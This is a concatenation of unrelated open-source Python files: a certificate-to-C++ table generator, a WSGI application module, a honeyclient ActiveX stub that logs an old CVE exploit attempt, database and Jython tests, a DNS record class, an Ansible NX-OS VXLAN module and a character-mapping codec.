| * Neither the name of Axiomatic Systems nor the
| names of its contributors may be used to endorse or promote products
| derived from this software without specific prior written permission.
|
| THIS SOFTWARE IS PROVIDED BY AXIOMATIC SYSTEMS ''AS IS'' AND ANY
| EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
| WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
| DISCLAIMED. IN NO EVENT SHALL AXIOMATIC SYSTEMS BE LIABLE FOR ANY
| DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
| (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
| LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
| ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
| (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
| SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
****************************************************************/
"""
if len(sys.argv) != 3:
print "usage: GenTrustAnchosTable.py <input-file> <category>"
print " where category may be 'Base', 'Extended', or other"
sys.exit(1)
INPUT_FILE = sys.argv[1]
CERT_CATEGORY = sys.argv[2]
digest_oid_pattern = "\x2a\x86\x48\x86\xf7\x0d\x01\x01"
in_cert = False
prev = ''
prev_prev = ''
index = 0
Certs = []
CertNames = []
CertComments = []
for line in open(sys.argv[1]).readlines():
if line.startswith('-----BEGIN CERTIFICATE-----'):
in_cert = True
b64 = ''
continue;
if line.startswith('-----END CERTIFICATE-----'):
cert = base64.decodestring(b64);
if not digest_oid_pattern in cert:
sys.stderr.write("-------- skipping cert (digest not supported) -------\n")
continue
Certs.append(cert)
cert_name = 'NptTlsTrustAnchor_%s_%04d' % (CERT_CATEGORY, index)
#cert_comment = eval('"'+prev_prev.rstrip('\r\n')+'"')
cert_comment = prev_prev.rstrip('\r\n')
CertNames.append(cert_name)
CertComments.append(cert_comment)
out = open(CERT_CATEGORY+'/'+cert_name+'.cpp', 'w+b')
out.write(FILE_HEADER)
out.write('/* %s */\n' % (cert_comment))
out.write('const unsigned char %s_Data[%d] = {\n' % (cert_name, len(cert)))
counter = 0
sep = ''
for byte in cert:
out.write('%s0x%02x' % (sep, ord(byte)))
counter += 1
sep = ','
if counter == 8:
out.write('\n')
counter = 0
in_cert = False
out.write('};\n')
out.write('const unsigned int %s_Size = %d;\n' % (cert_name, len(cert)))
index += 1
out.close()
continue
if in_cert:
b64 += line.rstrip('\r\n')
else:
prev_prev = prev
prev = line
out = open('NptTlsDefaultTrustAnchors'+CERT_CATEGORY+'.cpp', 'w+b')
out.write(FILE_HEADER)
out.write("/* This file is automatically generated by GenTrustAnchorsTables.py, do not edit */\n\n")
out.write('#include "NptTls.h"\n')
total_size = 0
for i in xrange(0, len(CertNames)):
out.write('#include "'+CERT_CATEGORY+'/'+CertNames[i]+'.cpp" /* '+CertComments[i]+' */\n')
total_size += len(Certs[i])
out.write("/* total anchors size ="+ str(total_size)+" */\n\n")
out.write('const NPT_TlsTrustAnchorData NptTlsDefaultTrustAnchors%s[%s] = {\r\n' % (CERT_CATEGORY, 1+len(Certs)))
sep = ' '
for i in xrange(0, len(Certs)):
out.write('%s{ %s_Data, %s_Size} /* %s */' % (sep, CertNames[i], CertNames[i], CertComments[i]))
sep = ',\r\n '
out.write(sep+'{0, 0} /* sentinel */\n')
out.write('};\n')
out.close()
out = open('NptTlsDefaultTrustAnchors'+CERT_CATEGORY+'.h', 'w+b')
out.write(FILE_HEADER)
out.write("/* This file is automatically generated by GenTrustAnchorsTables.py, do not edit */\n\n")
out.write('#include "NptTls.h"\n\n')
out.write('extern const NPT_TlsTrustAnchorData NptTlsDefaultTrustAnchors%s[%d];\n\n' % (CERT_CATEGORY, 1+len(Certs)))
for i in xrange(0, len(CertNames)):
out.write('/* '+CertComments[i]+' */\n')
out.write('extern const unsigned int %s_Size;\n' % (CertNames[i]))
out.write('extern const unsigned char %s_Data[];\n\n' % (CertNames[i]))
out.close()
|
beekpr/wsgiservice
|
refs/heads/master
|
wsgiservice/application.py
|
1
|
"""Components responsible for building the WSGI application."""
import logging
import webob
import wsgiservice
import wsgiservice.resource
logger = logging.getLogger(__name__)
class Application(object):
"""WSGI application wrapping a set of WsgiService resources. This class
can be used as a WSGI application according to :pep:`333`.
:param resources: A list of :class:`wsgiservice.Resource` classes to be
served by this application.
.. todo:: Easy deployment using good configuration file handling
"""
#: A list of request attributes to log. Each of these must be a valid
#: attribute name of a :class:`webob.Request` instance and is included in
#: the log output if it's non-empty. (Default: ['url', 'remote_user',
#: 'remote_addr', 'referer'])
LOG_DATA = ['url', 'remote_user', 'remote_addr', 'referer']
#: A list of request headers to log. Each of these is logged if it was sent by
#: the client and is non-empty. (Default: ['From'])
LOG_HEADERS = ['From']
#: :class:`wsgiservice.resource.Resource` class. Used as the default
#: resource when the routing does not return any match.
NOT_FOUND_RESOURCE = wsgiservice.resource.NotFoundResource
#: Resource classes served by this application. Set by the constructor.
_resources = None
#: :class:`wsgiservice.routing.Router` instance. Set by the constructor.
_urlmap = None
def __init__(self, resources):
"""Constructor.
:param resources: List of :class:`wsgiservice.resource.Resource`
classes to be served by this application.
"""
self._resources = resources
self._urlmap = wsgiservice.routing.Router(resources)
def __call__(self, environ, start_response):
"""WSGI entry point. Serve the best matching resource for the current
request. See :pep:`333` for details of this method.
:param environ: Environment dictionary.
:param start_response: Function called when the response is ready to
be served.
"""
try:
request = webob.Request(environ)
self._log_request(request)
response = self._handle_request(request)
return response(environ, start_response)
except Exception as e:
logger.exception('Uncaught exception in service: %s', e)
raise
def _log_request(self, request):
"""Log the most important parts of this request.
:param request: Object representing the current request.
:type request: :class:`webob.Request`
"""
msg = []
for d in self.LOG_DATA:
val = getattr(request, d)
if val:
msg.append(d + ': ' + repr(val))
for d in self.LOG_HEADERS:
if d in request.headers and request.headers[d]:
msg.append(d + ': ' + repr(request.headers[d]))
logger.info("Request information: %s", ', '.join(msg))
def _handle_request(self, request):
"""Finds the resource to which a request maps and then calls it.
Instantiates, fills and returns a :class:`webob.Response` object. If
no resource matches the request, a 404 status is set on the response
object.
:param request: Object representing the current request.
:type request: :class:`webob.Request`
"""
response = webob.Response(request=request)
path = request.path_info
parsed = self._urlmap(path)
if parsed:
path_params, resource = parsed
else:
path_params, resource = {}, self.NOT_FOUND_RESOURCE
instance = resource(request=request, response=response,
path_params=path_params, application=self)
response = instance()
if request.method == 'HEAD':
response.body = ''
return response
def get_app(defs, add_help=True):
"""Small wrapper function to returns an instance of :class:`Application`
which serves the objects in the defs. Usually this is called with return
value globals() from the module where the resources are defined. The
returned WSGI application will serve all subclasses of
:class:`wsgiservice.Resource` found in the dictionary.
:param defs: Each :class:`wsgiservice.Resource` object found in the values
of this dictionary is used as application resource. The other
values are discarded.
:type defs: dict
:param add_help: Whether to add the Help resource which will expose the
documentation of this service at /_internal/help
:type add_help: boolean
:rtype: :class:`Application`
"""
def is_resource(d):
try:
if issubclass(d, wsgiservice.Resource) and hasattr(d, '_path'):
return True
except TypeError:
pass # d wasn't a class
return False
resources = [d for d in defs.values() if is_resource(d)]
if add_help:
resources.append(wsgiservice.resource.Help)
return Application(resources)
|
buffer/thug
|
refs/heads/master
|
thug/ActiveX/modules/Spreadsheet.py
|
1
|
# OWC10/11.Spreadsheet ActiveX
# CVE-2009-1136
import logging
log = logging.getLogger("Thug")
def _Evaluate(self, *args):
log.ThugLogging.log_exploit_event(self._window.url,
"OWC 10/11.Spreadsheet ActiveX",
"Attack in _Evaluate function",
cve = "CVE-2009-1136")
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2009-1136")
def Evaluate(self, *args):
log.ThugLogging.log_exploit_event(self._window.url,
"OWC 10/11.Spreadsheet ActiveX",
"Attack in Evaluate function",
cve = "CVE-2009-1136")
log.ThugLogging.log_classifier("exploit", log.ThugLogging.url, "CVE-2009-1136")
|
gabrielfalcao/lettuce
|
refs/heads/master
|
tests/integration/lib/Django-1.2.5/tests/regressiontests/middleware_exceptions/__init__.py
|
12133432
| |
adlius/osf.io
|
refs/heads/develop
|
api_tests/requests/__init__.py
|
12133432
| |
leeseulstack/openstack
|
refs/heads/master
|
neutron/plugins/ml2/drivers/cisco/nexus/__init__.py
|
12133432
| |
Azure/azure-documentdb-python
|
refs/heads/master
|
test/query_execution_context_tests.py
|
1
|
#The MIT License (MIT)
#Copyright (c) 2014 Microsoft Corporation
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import unittest
import uuid
import pytest
from six.moves import xrange
import azure.cosmos.documents as documents
import azure.cosmos.cosmos_client as cosmos_client
from azure.cosmos.execution_context import base_execution_context as base_execution_context
import azure.cosmos.base as base
import test.test_config as test_config
#IMPORTANT NOTES:
# Most test cases in this file create collections in your Azure Cosmos account.
# Collections are billing entities. By running these test cases, you may incur monetary costs on your account.
# To Run the test, replace the two member fields (masterKey and host) with values
# associated with your Azure Cosmos account.
@pytest.mark.usefixtures("teardown")
class QueryExecutionContextEndToEndTests(unittest.TestCase):
"""Routing Map Functionalities end to end Tests.
"""
host = test_config._test_config.host
masterKey = test_config._test_config.masterKey
connectionPolicy = test_config._test_config.connectionPolicy
@classmethod
def setUpClass(cls):
if (cls.masterKey == '[YOUR_KEY_HERE]' or
cls.host == '[YOUR_ENDPOINT_HERE]'):
raise Exception(
"You must specify your Azure Cosmos account values for "
"'masterKey' and 'host' at the top of this class to run the "
"tests.")
cls.client = cosmos_client.CosmosClient(QueryExecutionContextEndToEndTests.host,
{'masterKey': QueryExecutionContextEndToEndTests.masterKey},
QueryExecutionContextEndToEndTests.connectionPolicy)
cls.created_db = test_config._test_config.create_database_if_not_exist(cls.client)
cls.created_collection = cls.create_collection(cls.client, cls.created_db)
cls.collection_link = cls.created_collection['_self']
cls.document_definitions = []
# create a document using the document definition
for i in xrange(20):
d = {'id' : str(i),
'name': 'sample document',
'spam': 'eggs' + str(i),
'key': 'value'}
cls.document_definitions.append(d)
cls.insert_doc(cls.client, cls.created_db, cls.collection_link, cls.document_definitions)
@classmethod
def tearDownClass(cls):
cls.client.DeleteContainer(cls.collection_link)
def setUp(self):
# sanity check:
partition_key_ranges = list(self.client._ReadPartitionKeyRanges(self.collection_link))
self.assertGreaterEqual(len(partition_key_ranges), 1)
# sanity check: read documents after creation
queried_docs = list(self.client.ReadItems(self.collection_link))
self.assertEqual(
len(queried_docs),
len(self.document_definitions),
'create should increase the number of documents')
def test_no_query_default_execution_context(self):
options = {}
options['maxItemCount'] = 2
self._test_default_execution_context(options, None, 20)
def test_no_query_default_execution_context_with_small_last_page(self):
options = {}
options['maxItemCount'] = 3
self._test_default_execution_context(options, None, 20)
def test_simple_query_default_execution_context(self):
query = {
'query': 'SELECT * FROM root r WHERE r.id != @id',
'parameters': [
{ 'name': '@id', 'value': '5'}
]
}
options = {}
options['enableCrossPartitionQuery'] = True
options['maxItemCount'] = 2
res = self.client.QueryItems(self.collection_link, query, options)
self.assertEqual(len(list(res)), 19)
self._test_default_execution_context(options, query, 19)
def test_simple_query_default_execution_context_with_small_last_page(self):
query = {
'query': 'SELECT * FROM root r WHERE r.id != @id',
'parameters': [
{ 'name': '@id', 'value': '5'}
]
}
options = {}
options['enableCrossPartitionQuery'] = True
options['maxItemCount'] = 3
self._test_default_execution_context(options, query, 19)
def _test_default_execution_context(self, options, query, expected_number_of_results):
page_size = options['maxItemCount']
collection_link = self.GetDocumentCollectionLink(self.created_db, self.created_collection)
path = base.GetPathFromLink(collection_link, 'docs')
collection_id = base.GetResourceIdOrFullNameFromLink(collection_link)
def fetch_fn(options):
return self.client.QueryFeed(path,
collection_id,
query,
options)
######################################
# test next() behavior
######################################
ex = base_execution_context._DefaultQueryExecutionContext(self.client, options, fetch_fn)
it = ex.__iter__()
def invokeNext():
return next(it)
results = {}
# validate that invocations of next() produces the same results as expected
for _ in xrange(expected_number_of_results):
item = invokeNext()
results[item['id']] = item
self.assertEqual(len(results), expected_number_of_results)
# after the result set is exhausted, invoking next must raise a StopIteration exception
self.assertRaises(StopIteration, invokeNext)
######################################
# test fetch_next_block() behavior
######################################
ex = base_execution_context._DefaultQueryExecutionContext(self.client, options, fetch_fn)
results = {}
cnt = 0
while True:
fetched_res = ex.fetch_next_block()
fetched_size = len(fetched_res)
for item in fetched_res:
results[item['id']] = item
cnt += fetched_size
if (cnt < expected_number_of_results):
# backend may not necessarily return exactly page_size of results
self.assertEqual(fetched_size, page_size, "page size")
else:
if cnt == expected_number_of_results:
self.assertTrue(fetched_size <= page_size, "last page size")
break
else:
#cnt > expected_number_of_results
self.fail("more results than expected")
# validate the number of collected results
self.assertEqual(len(results), expected_number_of_results)
# no more results will be returned
self.assertEqual(ex.fetch_next_block(), [])
@classmethod
def create_collection(cls, client, created_db):
collection_definition = { 'id': 'query_execution_context_tests collection ' + str(uuid.uuid4()),
'partitionKey':
{
'paths': ['/id'],
'kind': documents.PartitionKind.Hash
}
}
collection_options = { }
created_collection = client.CreateContainer(created_db['_self'],
collection_definition,
collection_options)
return created_collection
@classmethod
def insert_doc(cls, client, created_db, collection_link, document_definitions):
# create a document using the document definition
created_docs = []
for d in document_definitions:
created_doc = client.CreateItem(collection_link, d)
created_docs.append(created_doc)
return created_docs
def GetDatabaseLink(self, database, is_name_based=True):
if is_name_based:
return 'dbs/' + database['id']
else:
return database['_self']
def GetDocumentCollectionLink(self, database, document_collection, is_name_based=True):
if is_name_based:
return self.GetDatabaseLink(database) + '/colls/' + document_collection['id']
else:
return document_collection['_self']
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
azoft-dev-team/imagrium
|
refs/heads/win
|
env/Lib/test/test_inspect_jy.py
|
23
|
"""Misc inspect tests
Made for Jython.
"""
import inspect
import unittest
from java.lang import System
from test import test_support
class InspectTestCase(unittest.TestCase):
def test_java_routine(self):
self.assertTrue(inspect.isroutine(System.arraycopy))
def test_main():
test_support.run_unittest(InspectTestCase)
if __name__ == '__main__':
test_main()
|
felipsmartins/namebench
|
refs/heads/master
|
nb_third_party/dns/rdtypes/ANY/AFSDB.py
|
248
|
# Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.mxbase
class AFSDB(dns.rdtypes.mxbase.UncompressedDowncasingMX):
"""AFSDB record
@ivar subtype: the subtype value
@type subtype: int
@ivar hostname: the hostname name
@type hostname: dns.name.Name object"""
# Use the property mechanism to make "subtype" an alias for the
# "preference" attribute, and "hostname" an alias for the "exchange"
# attribute.
#
# This lets us inherit the UncompressedMX implementation but lets
# the caller use appropriate attribute names for the rdata type.
#
# We probably lose some performance vs. a cut-and-paste
# implementation, but this way we don't copy code, and that's
# good.
def get_subtype(self):
return self.preference
def set_subtype(self, subtype):
self.preference = subtype
subtype = property(get_subtype, set_subtype)
def get_hostname(self):
return self.exchange
def set_hostname(self, hostname):
self.exchange = hostname
hostname = property(get_hostname, set_hostname)
|
kustodian/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/nxos/nxos_vxlan_vtep_vni.py
|
8
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_vxlan_vtep_vni
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Creates a Virtual Network Identifier member (VNI)
description:
- Creates a Virtual Network Identifier member (VNI) for an NVE
overlay interface.
author: Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- default, where supported, restores params default value.
options:
interface:
description:
- Interface name for the VXLAN Network Virtualization Endpoint.
required: true
vni:
description:
- ID of the Virtual Network Identifier.
required: true
assoc_vrf:
description:
- This attribute is used to identify and separate processing VNIs
that are associated with a VRF and used for routing. The VRF
and VNI specified with this command must match the configuration
of the VNI under the VRF.
type: bool
ingress_replication:
description:
- Specifies mechanism for host reachability advertisement.
choices: ['bgp','static', 'default']
multicast_group:
description:
- The multicast group (range) of the VNI. Valid values are
string and keyword 'default'.
peer_list:
description:
- Set the ingress-replication static peer list. Valid values
are an array, a space-separated string of ip addresses,
or the keyword 'default'.
suppress_arp:
description:
- Suppress arp under layer 2 VNI.
type: bool
suppress_arp_disable:
description:
- Overrides the global ARP suppression config.
This is available on NX-OS 9K series running 9.2.x or higher.
type: bool
version_added: "2.8"
state:
description:
- Determines whether the config should be present or not
on the device.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- nxos_vxlan_vtep_vni:
interface: nve1
vni: 6000
ingress_replication: default
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["interface nve1", "member vni 6000"]
'''
import re
from ansible.module_utils.network.nxos.nxos import get_config, load_config
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.config import CustomNetworkConfig
BOOL_PARAMS = [
'assoc_vrf',
'suppress_arp',
'suppress_arp_disable',
]
PARAM_TO_DEFAULT_KEYMAP = {
'multicast_group': '',
'peer_list': [],
'ingress_replication': '',
}
PARAM_TO_COMMAND_KEYMAP = {
'assoc_vrf': 'associate-vrf',
'interface': 'interface',
'vni': 'member vni',
'ingress_replication': 'ingress-replication protocol',
'multicast_group': 'mcast-group',
'peer_list': 'peer-ip',
'suppress_arp': 'suppress-arp',
'suppress_arp_disable': 'suppress-arp disable',
}
def get_value(arg, config, module):
command = PARAM_TO_COMMAND_KEYMAP[arg]
command_val_re = re.compile(r'(?:{0}\s)(?P<value>.*)$'.format(command), re.M)
if arg in BOOL_PARAMS:
command_re = re.compile(r'\s+{0}\s*$'.format(command), re.M)
value = False
if command_re.search(config):
value = True
elif arg == 'peer_list':
has_command_val = command_val_re.findall(config, re.M)
value = []
if has_command_val:
value = has_command_val
else:
value = ''
has_command_val = command_val_re.search(config, re.M)
if has_command_val:
value = has_command_val.group('value')
return value
def check_interface(module, netcfg):
config = str(netcfg)
has_interface = re.search(r'(?:interface nve)(?P<value>.*)$', config, re.M)
value = ''
if has_interface:
value = 'nve{0}'.format(has_interface.group('value'))
return value
def get_existing(module, args):
existing = {}
netcfg = CustomNetworkConfig(indent=2, contents=get_config(module))
interface_exist = check_interface(module, netcfg)
if interface_exist:
parents = ['interface {0}'.format(interface_exist)]
temp_config = netcfg.get_section(parents)
if 'member vni {0} associate-vrf'.format(module.params['vni']) in temp_config:
parents.append('member vni {0} associate-vrf'.format(module.params['vni']))
config = netcfg.get_section(parents)
elif "member vni {0}".format(module.params['vni']) in temp_config:
parents.append('member vni {0}'.format(module.params['vni']))
config = netcfg.get_section(parents)
else:
config = {}
if config:
for arg in args:
if arg not in ['interface', 'vni']:
existing[arg] = get_value(arg, config, module)
existing['interface'] = interface_exist
existing['vni'] = module.params['vni']
return existing, interface_exist
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
new_dict[new_key] = value
return new_dict
def state_present(module, existing, proposed, candidate):
commands = list()
proposed_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, proposed)
existing_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, existing)
for key, value in proposed_commands.items():
if key == 'associate-vrf':
command = 'member vni {0} {1}'.format(module.params['vni'], key)
if not value:
command = 'no {0}'.format(command)
commands.append(command)
elif key == 'peer-ip' and value != []:
for peer in value:
commands.append('{0} {1}'.format(key, peer))
elif key == 'mcast-group' and value != existing_commands.get(key):
commands.append('no {0}'.format(key))
vni_command = 'member vni {0}'.format(module.params['vni'])
if vni_command not in commands:
commands.append('member vni {0}'.format(module.params['vni']))
if value != PARAM_TO_DEFAULT_KEYMAP.get('multicast_group', 'default'):
commands.append('{0} {1}'.format(key, value))
elif key == 'ingress-replication protocol' and value != existing_commands.get(key):
evalue = existing_commands.get(key)
dvalue = PARAM_TO_DEFAULT_KEYMAP.get('ingress_replication', 'default')
if value != dvalue:
if evalue and evalue != dvalue:
commands.append('no {0} {1}'.format(key, evalue))
commands.append('{0} {1}'.format(key, value))
else:
if evalue:
commands.append('no {0} {1}'.format(key, evalue))
elif value is True:
commands.append(key)
elif value is False:
commands.append('no {0}'.format(key))
elif value == 'default' or value == []:
if existing_commands.get(key):
existing_value = existing_commands.get(key)
if key == 'peer-ip':
for peer in existing_value:
commands.append('no {0} {1}'.format(key, peer))
else:
commands.append('no {0} {1}'.format(key, existing_value))
else:
if key.replace(' ', '_').replace('-', '_') in BOOL_PARAMS:
commands.append('no {0}'.format(key.lower()))
else:
command = '{0} {1}'.format(key, value.lower())
commands.append(command)
if commands:
vni_command = 'member vni {0}'.format(module.params['vni'])
ingress_replications_command = 'ingress-replication protocol static'
ingress_replicationb_command = 'ingress-replication protocol bgp'
ingress_replicationns_command = 'no ingress-replication protocol static'
ingress_replicationnb_command = 'no ingress-replication protocol bgp'
interface_command = 'interface {0}'.format(module.params['interface'])
if any(c in commands for c in (ingress_replications_command, ingress_replicationb_command,
ingress_replicationnb_command, ingress_replicationns_command)):
static_level_cmds = [cmd for cmd in commands if 'peer' in cmd]
parents = [interface_command, vni_command]
commands = [cmd for cmd in commands if 'peer' not in cmd]
for cmd in commands:
parents.append(cmd)
candidate.add(static_level_cmds, parents=parents)
elif 'peer-ip' in commands[0]:
static_level_cmds = [cmd for cmd in commands]
parents = [interface_command, vni_command, ingress_replications_command]
candidate.add(static_level_cmds, parents=parents)
if vni_command in commands:
parents = [interface_command]
commands.remove(vni_command)
if module.params['assoc_vrf'] is None:
parents.append(vni_command)
candidate.add(commands, parents=parents)
def state_absent(module, existing, proposed, candidate):
if existing['assoc_vrf']:
commands = ['no member vni {0} associate-vrf'.format(
module.params['vni'])]
else:
commands = ['no member vni {0}'.format(module.params['vni'])]
parents = ['interface {0}'.format(module.params['interface'])]
candidate.add(commands, parents=parents)
def main():
argument_spec = dict(
interface=dict(required=True, type='str'),
vni=dict(required=True, type='str'),
assoc_vrf=dict(required=False, type='bool'),
multicast_group=dict(required=False, type='str'),
peer_list=dict(required=False, type='list'),
suppress_arp=dict(required=False, type='bool'),
suppress_arp_disable=dict(required=False, type='bool'),
ingress_replication=dict(required=False, type='str', choices=['bgp', 'static', 'default']),
state=dict(choices=['present', 'absent'], default='present', required=False),
)
argument_spec.update(nxos_argument_spec)
mutually_exclusive = [('suppress_arp', 'suppress_arp_disable'),
('assoc_vrf', 'multicast_group'),
('assoc_vrf', 'suppress_arp'),
('assoc_vrf', 'suppress_arp_disable'),
('assoc_vrf', 'ingress_replication')]
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True,
)
warnings = list()
result = {'changed': False, 'commands': [], 'warnings': warnings}
if module.params['peer_list']:
if module.params['peer_list'][0] != 'default' and module.params['ingress_replication'] != 'static':
module.fail_json(msg='ingress_replication=static is required '
'when using peer_list param')
else:
peer_list = module.params['peer_list']
if peer_list[0] == 'default':
module.params['peer_list'] = 'default'
else:
stripped_peer_list = list(map(str.strip, peer_list))
module.params['peer_list'] = stripped_peer_list
state = module.params['state']
args = PARAM_TO_COMMAND_KEYMAP.keys()
existing, interface_exist = get_existing(module, args)
if state == 'present':
if not interface_exist:
module.fail_json(msg="The proposed NVE interface does not exist. Use nxos_interface to create it first.")
elif interface_exist != module.params['interface']:
module.fail_json(msg='Only 1 NVE interface is allowed on the switch.')
elif state == 'absent':
if interface_exist != module.params['interface']:
module.exit_json(**result)
elif existing and existing['vni'] != module.params['vni']:
module.fail_json(
msg="ERROR: VNI delete failed: Could not find vni node for {0}".format(module.params['vni']),
existing_vni=existing['vni']
)
proposed_args = dict((k, v) for k, v in module.params.items()
if v is not None and k in args)
proposed = {}
for key, value in proposed_args.items():
if key in ['multicast_group', 'peer_list', 'ingress_replication']:
if str(value).lower() == 'default':
value = PARAM_TO_DEFAULT_KEYMAP.get(key, 'default')
if key != 'interface' and existing.get(key) != value:
proposed[key] = value
candidate = CustomNetworkConfig(indent=3)
if state == 'present':
state_present(module, existing, proposed, candidate)
elif existing and state == 'absent':
state_absent(module, existing, proposed, candidate)
if candidate:
candidate = candidate.items_text()
result['changed'] = True
result['commands'] = candidate
if not module.check_mode:
load_config(module, candidate)
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gc3-uzh-ch/easybuild-framework
|
refs/heads/master
|
easybuild/__init__.py
|
3
|
##
# Copyright 2011-2014 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Declares EasyBuild namespace, in an extendable way.
@author: Jens Timmerman (Ghent University)
"""
from pkgutil import extend_path
# we're not the only ones in this namespace
__path__ = extend_path(__path__, __name__) #@ReservedAssignment
|
ThiagoGarciaAlves/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyCompatibilityInspection/raiseMultipleArgs.py
|
2
|
try:
a
except :
<warning descr="Python version 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6, 3.7 do not support this syntax.">raise ImportError, ImportWarning</warning>
|
makermade/arm_android-21_arm-linux-androideabi-4.8
|
refs/heads/master
|
lib/python2.7/encodings/mac_iceland.py
|
593
|
""" Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-iceland',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
